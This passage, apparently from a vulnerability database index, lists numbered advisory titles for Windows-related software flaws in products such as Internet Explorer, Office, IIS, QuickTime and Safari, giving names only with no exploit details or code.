Server _layouts/help.aspx cid0 Parameter XSS [64083] Microsoft IE XSS Filter Script Tag Filtering Weakness [63931] HP Operations Manager on Windows SourceView ActiveX (srcvw32.dll / srcvw4.dll) LoadFile() Method Remote Overflow [63766] Adobe Reader on Windows PDF Document Embedded EXE File Arbitrary Code Execution [63748] Microsoft Office Publisher 97 File Conversion TextBox Processing Overflow [63742] Microsoft Office Visio Unspecified Index Calculation Memory Corruption [63741] Microsoft Office Visio Unspecified Attribute Validation Memory Corruption [63653] DWG Windows FTP Server Multiple Command Login Restriction Bypass [63522] Microsoft Virtual PC / Server Hypervisor Virtual Machine Monitor Memory Management Implementation Memory Location Protection Mechanism Restriction Bypass [63473] Microsoft IE XML Document Image Element SRC Attribute Unspecified Issue [63470] Microsoft IE Unspecified Arbitrary Code Execution (PWN2OWN) [63469] Microsoft IE DLL File Base Address Discovery Overflow (PWN2OWN) [63451] Apple QuickTime on Windows Crafted BMP File Arbitrary Code Execution [63450] Apple iTunes on Windows Installation Package Race Condition Local Privilege Escalation [63448] Apple QuickTime on Windows MediaVideo Sample Description Atom (STSD) Parsing Memory Corruption [63447] Apple QuickTime on Windows Crafted PICT Image Overflow [63428] Microsoft Wireless Keyboard MAC Address XOR Key Generation Weakness [63335] Microsoft IE Unspecified Uninitialized Memory Corruption [63334] Microsoft IE Post Encoding Information Disclosure [63333] Microsoft IE Unspecified Race Condition Memory Corruption [63332] Microsoft IE Object Handling Unspecified Memory Corruption (2010-0490) [63331] Microsoft IE HTML Object onreadystatechange Event Handler Memory Corruption [63330] Microsoft IE HTML Rendering Unspecified Memory Corruption [63329] Microsoft IE Tabular Data Control (TDC) ActiveX URL Handling CTDCCtl::SecurityCHeckDataURL Function Memory Corruption [63328] Microsoft IE HTML Element Handling Cross-Domain Information Disclosure [63327] Microsoft IE CTimeAction Object TIME2 Handling Memory Corruption [63324] Microsoft IE createElement Method Crafted JavaScript NULL Dereference DoS [63322] Apple Safari on Windows JavaScriptCore.dll HTML Document Object Substring Occurrence DoS [63296] Windows Media Player Error Message Remote File Enumeration [63262] Mozilla Multiple Products on Windows extensions/auth/nsAuthSSPI.cpp nsAuthSSPI::Unwrap Function DoS [63260] CA ARCserve Backup for Windows JRE Multiple Unspecified Issues [63247] Novell eDirectory for Windows Malformed HTTP Request Handling Remote Overflow [63139] lighttpd on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63138] Mongoose on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63137] Cherokee Web Server on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [62938] Apple Safari on Windows URL Scheme Validation Crafted HTML File Handling Arbitrary Code Execution [62936] Apple Safari on Windows ImageIO Crafted TIFF File Arbitrary Code Execution [62935] Apple Safari on Windows ImageIO Crafted TIFF File Process Memory Disclosure [62934] Apple Safari on Windows ImageIO Crafted BMP File Process Memory Disclosure [62933] Apple Safari / iTunes on Windows ColorSync Crafted Image Color Profile Overflow [62823] Microsoft Office Excel XLS File DbOrParamQry Record Parsing Overflow [62822] Microsoft Office Excel XLSX File ZIP Header Processing Memory Corruption [62821] Microsoft Office Excel FNGROUPNAME Record Handling Memory Corruption [62820] Microsoft Office Excel Workbook Globals Stream MDXSET Record Handling Overflow [62819] Microsoft Office Excel MDXTUPLE Record Handling Overflow [62818] Microsoft Office Excel Sheet Object Type Confusion Arbitrary Code Execution [62817] Microsoft Office Excel File Record Handling Unspecified Memory Corruption [62810] Microsoft IE iepeers.dll Use-After-Free Arbitrary Code Execution [62751] Apple Safari on Windows CFNetwork cfnetwork.dll Multiple Element Remote DoS [62587] Hitachi JP1/Cm2/Network Node Manager Remote Console on WIndows File Permission Weakness Unspecified Local Privilege Escalation [62547] Adobe getPlus DLM (Download Manager) on Windows getPlus Downloader Software Installation Authorization Weakness [62466] Microsoft IE CSS Stylesheet Cross-origin Information Disclosure [62438] Google Gadget ActiveX Microsoft ATL Template Unspecified Arbitrary Code Execution [62400] Microsoft Wordpad Malformed RTF File Parsing Memory Exhaustion DoS [62309] Google Chrome on Windows Shortcut Character Escaping Arbitrary Program Execution [62246] Microsoft Data Analyzer ActiveX Web Page Handling Unspecified Arbitrary Code Execution [62241] Microsoft Office Powerpoint TextBytesAtom Record Handling Remote Code Execution [62240] Microsoft Office Powerpoint TextCharsAtom Record Handling Remote Code Execution [62239] Microsoft Office Powerpoint File Path Handling Overflow [62238] Microsoft Office Powerpoint LinkedSlideAtom Handling Remote Code Execution [62237] Microsoft Office Powerpoint OEPlaceholderAtom placementId Parameter Handling Remote Code Execution [62236] Microsoft Office Powerpoint msofbtClientData Container OEPlaceholderAtom Use After Free Remote Code Execution [62235] Microsoft Office Excel MSO.DLL OfficeArtSpgr Container Overflow [62229] Microsoft IIS Crafted DNS Response Inverse Lookup Log Corruption XSS [62221] OpenSolaris Default Configuration smbadm Windows Active Directory Domain Joining Unspecified Issue [62220] OpenSolaris Default Configuration kclient Windows Active Directory Domain Joining Unspecified Issue [62157] Microsoft IE text/html Content Type URLMON Sniffing Arbitrary File Access [62156] Microsoft IE Dynamic OBJECT Tag Cross-domain Arbitrary File Access [61914] Microsoft IE Javascript Cloned DOM Object Handling Memory Corruption [61913] Microsoft IE HTML Object Handling Unspecified Memory Corruption [61912] Microsoft IE Baseline Tag Rendering Memory Corruption [61911] Microsoft IE Table Layout Reuse Memory Corruption [61910] Microsoft IE Table Layout Col Tag Cache Update Handling Memory Corruption [61909] Microsoft IE Unspecified Crafted URL Handling Arbitrary Code Execution [61908] Cisco InternetWork Performance Monitor on Windows getProcessName CORBA GIOP Request Overflow [61906] Adobe Flash Player on Windows ActiveX Unspecified Arbitrary Remote Code Execution [61905] Adobe Flash Player on Windows Use-after-free Movie Unloading Memory Corruption [61697] Microsoft IE mshtml.dll Use-After-Free Arbitrary Code Execution (Aurora) [61525] Microsoft Commerce Server ADMINDBPS Registry Key Encoded Password Local Disclosure [61516] Apple Safari for Windows search-ms Protocol Handler Arbitrary Program Execution [61432] Microsoft IIS Colon Safe Extension NTFS ADS Filename Syntax Arbitrary Remote File Creation [61294] Microsoft IIS ASP Crafted semicolon Extension Security Bypass [61249] Microsoft IIS ctss.idc table Parameter SQL Injection [61203] GTK+ gdk/gdkwindow.c gdk_window_begin_implicit_paint() Function Foreign Windows Weakness [60891] Adobe Flash Player ActiveX on Windows Unspecified Arbitrary File Access [60839] Microsoft IE CAttrArray Object Circular Dereference Remote Code Execution [60838] Microsoft IE CSS Element Access Race Condition Memory Corruption [60837] Microsoft IE XHTML DOM Manipulation Memory Corruption [60834] Microsoft WordPad / Office Text Converters Word97 File Handling Memory Corruption [60830] Microsoft Office Project File Handling Memory Validation Arbitrary Code Execution [60804] Novell iPrint Client on Windows Unspecified Time Information Overflow [60803] Novell iPrint Client on Windows ienipp.ocx target-frame Parameter Handling Overflow [60660] Microsoft IE Response-Changing Mechanism Output Encoding XSS [60587] Windows File Sharing Samba Client Resource Exhaustion DoS [60578] Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking [60510] SugarCRM on Windows .htaccess Direct Request Arbitrary File Access [60504] Microsoft IE PDF Export Title Property File Path Disclosure [60490] Microsoft IE Layout STYLE Tag getElementsByTagName Method Handling Memory Corruption [60437] PHP on Windows popen Invalid Mode Handling DoS [60401] Microsoft IE Crafted DHTML AnchorClick Attribute Handling Remote DoS [60397] Microsoft Outlook HTML Email CODEBASE Parameter Arbitrary Program Execution [60370] PGP PGPDisk Windows User Switching Cross-user Plaintext Information Disclosure [60317] HP Operations Manager on Windows Unspecified Access Restriction Bypass [60295] Microsoft IE Image ICC Profile Tag Count Handling DoS [60294] Microsoft MSN Messenger Image ICC Profile Tag Count Handling DoS [60285] Apple QuickTime / Darwin Streaming Server on Windows parse_xml.cgi filename Parameter Traversal Arbitrary File Access [60282] Microsoft Pocket IE (PIE) object.innerHTML Function Remote DoS [60198] Microsoft IE DHTML Property setHomePage Method JavaScript Loop Remote DoS [60176] Apache Tomcat Windows Installer Admin Default Password [60134] Netscape sun.awt.windows.WDefaultFontCharset Java Class WDefaultFontCharset Constructor Overflow [60047] SecureClean Windows Alternatve Data Stream Information Disclosure [60046] PGP Data Wipe Windows Alternatve Data Stream Information Disclosure [60045] Sami Tolvanen Eraser Windows Alternatve Data Stream Information Disclosure [60044] East-Tec Eraser 2002 Windows Alternatve Data Stream Information Disclosure [60043] BCWipe Windows Alternatve Data Stream Information Disclosure [60020] Microsoft Visual C++ MFC Static Library ISAPI Extension (Isapi.cpp) CHttpServer::OnParseError Overflow [60004] Microsoft SQL Server Multiple Stored Procedure Unprivileged Configuration Manipulation [59996] Apple Mac OS X QuickLook Crafted Microsoft Office Document Handling Overflow [59968] Microsoft Multiple Products SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection [59915] Sun Java SE Swing Implementation Windows Pluggable Look and Feel (PL&amp [59907] MySQL on Windows bind-address Remote Connection Weakness [59906] MySQL on Windows Default Configuration Logging Weakness [59892] Microsoft IIS Malformed Host Header Remote DoS [59886] Microsoft Exchange Malformed Microsoft Remote Procedure Call (MSRPC) Remote DoS [59866] Microsoft Office Excel Document Record Parsing Memory Corruption [59864] Microsoft Office Excel Malformed Record Object Sanitization Failure Arbitrary Code Execution [59863] Microsoft Office Excel Formula Handling Pointer Corruption Arbitrary Code Execution [59862] Microsoft Office Excel Cell Embeded Formula Parsing Memory Corruption [59861] Microsoft Office Excel BIFF Record Parsing Overflow [59860] Microsoft Office Excel BIFF File FEATHEADER cbHdrData Size Element Handling Memory Corruption [59859] Microsoft Office Excel SxView Record Handling Memory Corruption [59858] Microsoft Office Excel Malformed PivotCache Stream Handling Memory Corruption [59857] Microsoft Office Word Document Malformed File Information Block (FIB) Parsing Memory Corruption [59826] vqSoft vqServer for Windows DOS Filename Request Access Bypass [59808] Microsoft Exchange Request Saturation License Exhaustion Remote DoS [59774] Multiple Antivirus Microsoft Exchange Malformed E-mail X Header Scan Bypass [59718] Sun Java JDK / JRE on Windows Update Notification Weakness [59688] Novell NetWare Client on Windows Help Feature Login Authentication Bypass [59653] Microsoft MN-500 Backup Function Cleartext Credential Local Disclosure [59636] Microsoft SQL Server SQL Authentication Password Encryption Weakness [59635] My Remote File Server on Windows Permission Weakness Local Privilege Escalation [59621] Microsoft IIS CodeBrws.asp Off-By-One File Check Bypass Source Disclosure [59615] ProxyView Embedded Windows NT Default Admin Account Password [59563] Microsoft Baseline Security Analyzer (MBSA) Security Scan Result Cleartext Local Disclosure [59561] Microsoft IIS CodeBrws.asp Encoded Traversal Arbitrary File Source Disclosure [59503] Microsoft IE Rendering Engine Crafted MIME Type Arbitrary Script Execution [59502] Microsoft IE / Outlook Express Crafted XML Stylesheet (XSL) Arbitrary Script Execution [59501] Microsoft IE MSScriptControl.ScriptControl / GetObject Frame Domain Validation Bypass [59500] Microsoft IE HTML Parser (MSHTML.DLL) Browser Window Object Handling DoS [59479] Microsoft Office SharePoint Server Team Services _layouts/download.aspx Multiple Parameter ASP.NET Source Disclosure [59360] Microsoft IIS ASP Page Visual Basic Script Malformed Regex Parsing DoS [59326] Napster Client on Windows Message Handling Overflow [59323] Microsoft IE Active Movie ActiveX Arbitrary File Download [59322] Microsoft Jet Database Crafted Query Arbitrary Command Execution [59289] Microsoft Java Virtual Machine getSystemResourceAsStream Function Arbitrary File Access [59263] Microsoft IE IMG Tag width Handling DoS [59259] Microsoft Site Server / Commercial Internet System (MCIS) Cookie Expiry Weakness [59258] Microsoft Exchange ACL Modification Update Weakness [59253] Windows File Sharing for Apple Mac OS X Improper Shutdown Unspecified Issue [59249] Windows NT Unprivileged Local Share Manipulation [59101] Oracle Database on Windows Net Foundation Layer Unspecified Remote Issue [59066] IBM Rational AppScan on Windows Help Pages Query String XSS [58907] Adobe Reader / Acrobat on Windows ActiveX Unspecified DoS [58878] Skype Extras Manager on Windows Unspecified Issue [58874] Microsoft IE CSS Parsing writing-mode Style Memory Corruption [58873] Microsoft IE DOM Copy Constructor Event Object Initialization Memory Corruption [58872] Microsoft IE HTML Component Handling Arbitrary Code Execution [58871] Microsoft IE Data Stream Header Corruption Arbitrary Code Execution [58870] Microsoft Office BMP Image Color Processing Overflow [58869] Microsoft Office Malformed Object Handling Memory Corruption Arbitrary Code Execution [58868] Microsoft Multiple Products GDI+ PNG Image Handling Integer Overflow [58867] Microsoft Multiple Products GDI+ .NET API Code Execution Privilege Escalation [58866] Microsoft Multiple Products GDI+ TIFF Image Handling Memory Corruption Arbitrary Code Execution [58865] Microsoft Multiple Products GDI+ TIFF Image Handling Overflow [58864] Microsoft Multiple Products GDI+ PNG Image Handling Heap Overflow [58863] Microsoft Multiple Products GDI+ WMF Image Handling Overflow [58851] Microsoft .NET Framework / Silverlight Crafted Application Memory Manipulation Arbitrary Code Execution [58850] Microsoft .NET Framework Object Casting Manipulation Arbitrary Code Execution [58849] Microsoft .NET Framework Crafted Application Managed Pointer Access Arbitrary Code Execution [58817] Microsoft IE Nested marquee Tag Handling DoS [58788] Microsoft IE Crafted File Extension Download Security Warning Bypass [58736] Jetty on Windows Double Slash (//) Path Aliasing Unspecified Issue [58656] Trend Micro ServerProtect for Windows EarthAgent.exe Multiple RPC Functions Remote Overflow [58536] Hart InterCivic EMS Windows Registry Ballot Now Database Private Key Disclosure [58480] Microsoft IE X.509 Certificate Authority (CA) Common Name Null Byte Handling SSL MiTM Weakness [58403] avast! Home / Professional for Windows avast4.ini ashWsFtr.dll Subversion Local Privilege Escalation [58399] Microsoft IE window.print Function Loop Remote DoS [58397] Microsoft IE Auto Form Submission KEYGEN Element Remote DoS [58350] Microsoft Patterns &amp [58253] HP ProCurve Identity Driven Manager on Windows Unspecified Local Privilege Escalation [58188] PHP on Windows popen Invalid Mode Handling DoS [58127] CreativeLabs es1371mp.sys WDM Audio Driver on Windows IRP Request Handling Local Privilege Escalation [58104] Xerver on Windows HTTP Server ::$DATA Extension Request Arbitrary File Access [58092] Diebold Global Election Management System (GEMS) Server Windows Access Database Corruption DoS [58013] OpenOffice.org (OOo) on Windows Unspecified Client-side Issue [58012] OpenOffice.org (OOo) on Windows Unspecified Client-side Stack Overflow [58009] OpenOffice.org (OOo) on Windows Unspecified Client-side Issue [57959] Interstage Application Server HTTP Server on Windows Unspecified Crafted Request DoS [57955] Samba Unconfigured Home Directory Windows File Share Directory Access Restriction Bypass [57942] SAP NetWeaver on Windows Unspecified Overflow [57941] SAP NetWeaver on Windows Unspecified NULL Dereference DoS [57940] SAP NetWeaver on Windows Unspecified Information Disclosure [57926] Symantec Altiris Deployment Solution on Windows Unspecified Client-side Issue (3) [57925] Symantec Altiris Deployment Solution on Windows Unspecified Client-side Issue (2) [57924] Symantec Altiris Deployment Solution on Windows Unspecified Client-side Issue (1) [57906] Perforce Server on Windows P4S.EXE Unspecified Infinite Loop DoS [57905] Perforce Server on Windows P4S.EXE Unspecified DoS (2) [57904] Perforce Server on Windows P4S.EXE Unspecified DoS (1) [57881] MailSite on Windows LDAP3A.exe Unspecified Heap Corruption [57880] MailSite on Windows LDAP3A.exe Unspecified Remote DoS [57872] IBM Tivoli Directory Server (TDS) on Windows ibmslapd.exe Unspecified NULL Dereference Remote DoS [57853] Business Objects Crystal Reports Server on Windows Unspecified Infinite Loop DoS [57804] Microsoft JScript Scripting Engine Memory Corruption Arbitrary Code Execution [57753] Microsoft IIS FTP Server Crafted Recursive Listing Remote DoS [57742] Microsoft SQL Cleartext User Passwords Disclosure [57740] X Windows (X11R4) -L Linked Binary Path Subversion Handling Local Privilege Escalation [57730] X Windows (X11R3/4) xterm Emulator Escape Sequence Handling Remote Privilege Escalation [57654] Microsoft IE JavaScript LI Element Creation Value Attribute Handling Remote DoS [57643] Quick Heal AntiVirus on Windows Unspecified Overflow [57638] Microsoft Outlook Express IMAP Client literal_size Remote Overflow [57616] DECwindows on Ultrix Memory Persistent Cleartext Credential Disclosure [57589] Microsoft IIS FTP Server NLST Command Remote Overflow [57515] Microsoft IE window.open() New Window URL Path Spoofing Weakness [57506] Microsoft IE location.hash Javascript Handling Remote DoS [57500] Sophos PureMessage for Microsoft Exchange Scan Engine Load Handling Scan Protection Bypass [57499] Sophos PureMessage for Microsoft Exchange EdgeTransport.exe TNEF-Encoded Message Cleartext Conversion DoS [57493] Sophos PureMessage Scanner (PMScanner.exe) for Microsoft Exchange Crafted File Handling DoS [57202] Serv-U FTP Server Windows Authenticated HTTP Session Termination Failure Weakness [57196] Serv-U FTP Server Windows Authentication Non-secure Login Weakness [57142] Microsoft IE Malformed DIV / SCRIPT Element Handling DoS [57118] Microsoft IE onblur() / onfocusout() Functions Nested Loop DoS [57113] Microsoft IE Extended HTML Form Non-HTTP Protocol XSS [57064] Microsoft IE Crafted UTF-7 Context XSS Filter Bypass [57063] Microsoft IE Multiple CRLF Injected HTTP Header XSS Filter Bypass [57062] Microsoft IE STYLE Element / CSS Expression Property Double Content Injection XSS Filter Bypass [56963] Sun Java SE Abstract Window Toolkit (AWT) on Windows 2000 Security Warning Icon Display Weakness [56916] Microsoft Office Web Components HTMLURL Parameter ActiveX Spreadsheet Object Handling Overflow [56915] Microsoft Office Web Components OWC10.Spreadsheet ActiveX BorderAround() Method Heap Corruption Arbitrary Code Execution [56914] Microsoft Office Web Components OWC10 ActiveX Loading/Unloading Memory Allocation Arbitrary Code Execution [56911] Microsoft Remote Desktop Server (RDS) mstscax.dll Packet Parsing Remote Overflow [56910] Microsoft Visual Studio Active Template Library (ATL) Header Mismatch Remote Code Execution [56905] Microsoft .NET Framework Request Scheduling Crafted HTTP Request Remote DoS [56852] Microsoft IE XML Document start-tags Handling CPU Consumption DoS [56779] Microsoft IE mshtml.dll JavaScript findText Method Unicode String Handling DoS [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection [56699] Microsoft Visual Studio Active Template Library (ATL) String Manipulation Arbitrary Memory Disclosure [56698] Microsoft Visual Studio Active Template Library (ATL) Data Stream Object Instantiation Remote Code Execution [56696] Microsoft Visual Studio Active Template Library (ATL) Headers VariantClear Corrupt Stream Handling Remote Code Execution [56695] Microsoft IE HTML Embedded CSS Property Modification Memory Corruption [56694] Microsoft IE Invalid HTML Object Element Appendage Handling Memory Corruption [56693] Microsoft IE timeChildren Object ondatasetcomplete Event Method Memory Corruption [56525] Microsoft Eyedog ActiveX Unspecified Overflow [56489] Microsoft IE Proxy Server CONNECT Response Cached Certificate Use MiTM HTTPS Site Spoofing [56485] Microsoft IE iFrame HTTP / HTTPS Content Detection Weakness [56480] Microsoft IE HTTP Response Refresh Header javascript: URI XSS [56474] Microsoft IIS WebDAV Extension URL Decode Crafted HTTP Request Authentication Bypass [56438] Microsoft XML Core Services Set-Cookie HTTP Response Header Restriction Weakness [56434] Web On Windows (WOW) ActiveX 2 Multiple Method Arbitrary Command Execution [56432] Microsoft IE onclick Action Mouse Click Subversion (Clickjacking) [56424] GoAhead WebServer on Windows MS-DOS Device Name Request DoS [56331] MapServer on Windows mapserv mapserv.c id Parameter Traversal Arbitrary File Access [56323] Microsoft IE Write Method Unicode String Argument Handling Remote DoS [56272] Microsoft Video ActiveX (msvidctl.dll) Unspecified Remote Arbitrary Code Execution [56254] Microsoft IE Select Object Length Property Handling Memory Consumption DoS [56015] NTP on Windows SO_EXCLUSIVEADDRUSE Unspecified Issue [55940] EiffelStudio on Windows IPv6 Listening Mode IPv4 Interface Traffic Disclosure [55855] Microsoft IE AddFavorite Method URL Handling Remote DoS [55845] Microsoft DirectX DirectShow quartz.dll QuickTime NumberOfEntries Field Memory Corruption [55844] Microsoft DirectX DirectShow QuickTime File Pointer Validation Arbitrary Code Execution [55838] Microsoft Office Publisher PUBCONV.DLL Legacy Format Importation Pointer Dereference Arbitrary Code Execution [55837] Microsoft Virtual PC / Virtual Server Instruction Decoding Unspecified Local Privilege Escalation [55836] Microsoft ISA Server 2006 Radius OTP Security Bypass [55806] Microsoft Office Web Components OWC10.Spreadsheet ActiveX msDataSourceObject() Method Memory Corruption [55651] Microsoft DirectShow Video Streaming ActiveX (msvidctl.dll) IMPEG2TuneRequest DirectX Object Interface Overflow [55509] VLC Media Player for Windows modules/access/smb.c Win32AddConnection() Function Overflow [55436] Motorola Timbuktu Pro for Windows PlughNTCommand Named Pipe String Handling Overflow [55345] Microsoft libc src/lib/libc/gen/fts.c fts_build() Function fts Nested Directory Handling Local DoS [55298] XEmacs on Windows glyphs-eimage.c Multiple Function Image File Handling Overflows [55269] Microsoft IIS Traversal GET Request Remote DoS [55227] CA ARCserve Backup for Windows Message Engine 0x3B Message Invalid Stub Data RPC Marshalling Error Remote DoS [55226] CA ARCserve Backup for Windows Message Engine ASCORE Module 0x13 Message Handling Remote DoS [55224] PHP on Windows Multiple Function safe_mode Bypass [55129] Microsoft IE HTTP Host Header Proxy Server CONNECT Response Document Context SSL Tampering Weakness [55021] Apple Safari on Windows Installer Application Launch Unspecified Compression Method Local Privilege Escalation [55012] Apple Safari on Windows Reset Safari Implementation Stored Web Password Persistence [54974] Apple Safari on Windows CoreGraphics TrueType Font Handling Memory Corruption [54966] PeaZIP on Windows ZIP Filename Handling Arbitrary Command Execution [54960] Microsoft Office Word Malformed Record Handling Overflow (2009-0565) [54959] Microsoft Office Word Malformed Length Field Handling Overflow (2009-0563) [54958] Microsoft Office Excel BIFF File QSIR Record Object Pointer Handling Remote Code Execution [54957] Microsoft Office Excel File SST Record Handling String Parsing Overflow [54956] Microsoft Office Excel Record Object Field Sanitization Memory Corruption [54955] Microsoft Office Excel Malformed Records Handling Overflow [54954] Microsoft Office Excel Record Parsing Array Indexing Memory Corruption [54953] Microsoft Office Excel Malformed Object Record Corruption Remote Code Execution [54952] Microsoft Office Excel Malformed Record Object Pointer Handling Remote Code Execution (2009-0549) [54951] Microsoft IE Crafted HTML Malformed Row Property References Memory Corruption [54950] Microsoft IE Crafted onreadystatechange Event Memory Corruption [54949] Microsoft IE Crafted HTML Document Node Addition Event Handler Memory Corruption [54948] Microsoft IE setCapture Function Object Handling Uninitialized Memory Corruption [54947] Microsoft IE Crafted AJAX XMLHttpRequest Synchronization Memory Corruption [54946] Microsoft IE DHTML tr Element Handling Crafted Method Memory Corruption [54945] Microsoft IE Cached Data Handling Cross-Domain Information Disclosure [54944] Microsoft IE Race Condition Cross-Domain Information Disclosure [54922] VMware Multiple Products on Windows Descheduled Time Accounting Driver Unspecified DoS [54875] Apple QuickTime on Windows Movie File Clipping Region (CRGN) Atom Parsing Overflow [54797] Microsoft DirectX DirectShow quartz.dll QuickTime NULL Byte Overwrite Arbitrary Code Execution [54709] Soulseek on Windows Search Query Handling Overflow [54700] Microsoft GDI+ gdiplus.dll GpFont:etData Function Crafted EMF File Handling Off-by-one Overflow [54555] Microsoft IIS WebDAV Unicode URI Request Authentication Bypass [54444] Apple Mac OS X Microsoft Office Spotlight Importer File Handling Memory Corruption [54394] Microsoft Office PowerPoint Multiple Record Types Handling Overflow [54393] Microsoft Office PowerPoint CurrentUserAtom Atom Parsing Multiple Overflows [54392] Microsoft Office PowerPoint Unspecified Crafted File Handling Heap Corruption [54391] Microsoft Office PowerPoint OutlineTextRefAtom Parsing Memory Corruption Arbitrary Code Execution [54390] Microsoft Office PowerPoint BuildList Record Parsing Memory Corruption Arbitrary Code Execution [54389] Microsoft Office PowerPoint PP7 Crafted File Handling Memory Corruption Arbitrary Code Execution (2009-1128) [54388] Microsoft Office PowerPoint PP7 Crafted File Handling Memory Corruption Arbitrary Code Execution (2009-0225) [54387] Microsoft Office PowerPoint PPT95 Import (PP7X32.DLL) File Handling Multiple Overflows [54386] Microsoft Office PowerPoint PPT Importer (PP4X32.DLL) Legacy File Format Handling Multiple Overflows [54385] Microsoft Office PowerPoint Conversion Filter (PP4X32.DLL) String Parsing Memory Corruption Arbitrary Code Execution [54384] Microsoft Office PowerPoint Conversion Filter (PP4X32.DLL) Structure Parsing Memory Corruption Arbitrary Code Execution (2009-0227) [54383] Microsoft Office PowerPoint Conversion Filter (PP4X32.DLL) Structure Parsing Memory Corruption Arbitrary Code Execution (2009-0223) [54382] Microsoft Office PowerPoint Legacy File Format Handling Unspecified Remote Code Execution (2009-0222) [54381] Microsoft Office PowerPoint Legacy File Format Handling Unspecified Remote Code Execution (2009-1137) [54292] Microsoft ActiveSync RNDIS over USB System Lock Bypass [54183] Microsoft IE Unprintable Character Document Handling DoS [53935] Xitami Web Server on Windows HTTP Request Connection Saturation Remote DoS [53933] Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflow [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload [53890] Trend Micro OfficeScan Client on Windows NTRtScan.exe Directory Pathname Handling Local DoS [53871] OpenX on Windows www/delivery/tjs.php trackerid Parameter Traversal Arbitrary File Deletion [53750] Oracle Outside In Technology Microsoft Office File Optional Data Stream Parsing Overflow [53749] Oracle Outside In Technology Microsoft Office Spreadsheet Record Handling Overflow (2009-1010) [53748] Oracle Outside In Technology Microsoft Excel Spreadsheet Record Handling Remote Overflow (2009-1009) [53695] VMware Multiple Products on Windows hcmon.sys Crafted IOCTL Handling Unspecified Local DoS [53671] Wireshark on Windows LDAP Dissector Unspecified DoS [53665] Microsoft Office Excel Malformed Object Handling Memory Corruption [53664] Microsoft WordPad Word 97 Text Converter File Handling Overflow [53663] Microsoft Office Word 2000 WordPerfect 6.x Converter Document Handling Stack Corruption [53662] Microsoft WordPad / Office Text Converter Malformed Data Handling Memory Corruption [53637] Microsoft ISA Server / Forefront Threat Management Gateway (TMG) Forms Authentication Component Unspecified XSS [53636] Microsoft ISA Server / Forefront Threat Management Gateway (TMG) Web Proxy TCP State Handling DoS [53632] Microsoft DirectShow MJPEG Decompression Unspecified Arbitrary Code Execution [53627] Microsoft IE Unitialized Object Memory Corruption Arbitrary Code Execution (2009-0554) [53626] Microsoft IE EMBED Element Handling Memory Corruption Arbitrary Code Execution [53625] Microsoft IE Unitialized Object Memory Corruption Arbitrary Code Execution (2009-0552) [53624] Microsoft IE Page Transition Unspecified Memory Corruption Arbitrary Code Execution [53454] Sybase Enterprise Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53453] Pramati Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53451] jo! jo Webserver on Windows Crafted Request WEB-INF Directory Information Disclosure [53450] HP Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53340] Microsoft IE JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness [53308] Apple Safari on Windows WebKit.dll ALINK Attribute Handling Memory Exhaustion DoS [53306] Microsoft Money prtstb06.dll ActiveX Startup Property Remote DoS [53231] Apple Safari on Windows XML Document Handling Application Crash DoS [53182] Microsoft Office PowerPoint PPT File Handling Unspecified Code Execution [53072] Citrix Presentation Server Client for Windows Process Memory Credential Information Disclosure [52924] Microsoft IIS WebDAV PROPFIND Method Forced Directory Listing [52898] Apple Safari for Windows feeds: URI Handling NULL Pointer Dereference DoS [52896] Mozilla Firefox on Windows _moveToEdgeShift() XUL Tree Method Garbage Collection Arbitrary Code Execution (PWN2OWN) [52830] HP Virtual Rooms Client on Windows Unspecified Arbitrary Remote Code Execution [52745] Adobe Flash Player on Windows Mouse Pointer Display Unspecified Clickjacking [52695] Microsoft Office Excel Crafted Document Invalid Object Reference Unspecified Code Execution [52692] Microsoft SMB NT Trans2 Request Parsing Unspecified Remote Code Execution [52691] Microsoft SMB NT Trans Request Parsing Overflow Remote Code Execution [52690] Microsoft Office Word Malformed Table Property Handling Memory Corruption [52689] Microsoft Word Document Handling HTML Object Tag DoS [52688] Microsoft Word Document Handling HTML Object Tag XSS [52686] Microsoft Office Hyperlink Target Digital Signatures Weakness [52684] Microsoft Forms Multiple ActiveX (FM20.dll) Memory Access Violations [52680] Microsoft IIS httpext.dll WebDav LOCK Method Nonexistent File Request Parsing Memory Exhaustion Remote DoS [52671] Microsoft IE shell32 Module Unspecified Form Data Handling Overflow [52670] Microsoft IE Double Injection Bypass Anti-XSS Filter Bypass [52669] Microsoft IE UTF-7 Character Set Bypass Anti-XSS Filter Bypass [52668] Microsoft IE CRLF Injection Multiple Method Bypass Anti-XSS Filter Bypass [52667] Microsoft IE navcancl.htm Local Resource Refresh Link XSS [52666] Microsoft IE Malformed file:// URI Handling DoS [52665] Microsoft IE IObjectSafety Functionality Object Creation Call DoS [52664] Microsoft IE Relative Path Handling Spoofing Weakness [52663] Microsoft IE Crafted Pop-up Directional Address Bar Spoofing [52660] Microsoft IE about:blank Blank Tab Spoofing Weakness [52599] IBM WebSphere Application Server (WAS) on Windows JSP Handling Unspecified Exposure (PK75248) [52530] IBM Tivoli Storage Manager HSM for Windows Unspecified Overflow [52491] Apple Safari for Windows Multiple Protocol Handler Null Dereference DoS [52490] Apple Safari for Windows http URI Handler Malformed Domain Name DoS [52468] IBM WebSphere Application Server (WAS) on Windows Installation Factory logs/instconfigifwas6.log Local Information Disclosure [52301] NovaNET on Windows nnwindtb.dll DtbClsLogin Function Overflow DoS [52287] Theme Engine for Drupal on Windows q Parameter Local File Inclusion [52238] Microsoft IIS IDC Extension XSS [51840] Microsoft IE XHTML Strict Mode CSS Handling Memory Corruption Arbitrary Code Execution [51839] Microsoft IE Document Object Handling Memory Corruption Arbitrary Code Execution [51838] Microsoft Exchange Server EMSMDB2 Invalid MAPI Command Remote DoS [51837] Microsoft Exchange Server Message Transport Neutral Encapsulation Format (TNEF) Decoding Remote Code Execution [51836] Microsoft Office Visio File Opening Memory Functions Arbitrary Code Execution [51835] Microsoft Office Visio Object 